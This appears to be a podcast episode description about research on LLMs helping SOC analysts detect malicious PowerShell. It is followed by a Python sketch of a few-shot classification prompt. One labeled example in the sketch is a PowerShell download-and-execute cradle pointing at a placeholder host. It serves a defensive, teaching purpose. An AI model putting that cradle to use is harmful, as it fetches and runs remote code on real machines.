Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can help security operations center (SOC) analysts identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation, to fine-tuning specialized models, Ryan walks us through three distinct approaches with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
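The "teaching LLMs through examples" approach is few-shot prompting: you show the model a handful of labeled scripts before the one you want classified. A minimal sketch of how such a prompt might be assembled (the example scripts, labels, and wording below are illustrative assumptions, not taken from the episode or the linked research):

```python
# Hedged sketch: building a few-shot classification prompt for PowerShell
# triage. The labeled examples here are hypothetical illustrations.

EXAMPLES = [
    ("Get-Process | Sort-Object CPU -Descending", "benign"),
    ("IEX (New-Object Net.WebClient).DownloadString('http://x/p.ps1')", "malicious"),
]

def build_prompt(script: str) -> str:
    """Assemble a few-shot prompt: task instruction, labeled examples,
    then the unlabeled script for the LLM to classify."""
    lines = ["Classify each PowerShell script as 'benign' or 'malicious'.", ""]
    for example, label in EXAMPLES:
        lines += [f"Script: {example}", f"Label: {label}", ""]
    lines += [f"Script: {script}", "Label:"]
    return "\n".join(lines)

prompt = build_prompt("Invoke-Expression ([Text.Encoding]::UTF8.GetString($b))")
print(prompt)
```

The resulting string would be sent to whatever LLM is in use; retrieval-augmented generation extends the same idea by fetching the labeled examples or security context dynamically rather than hard-coding them.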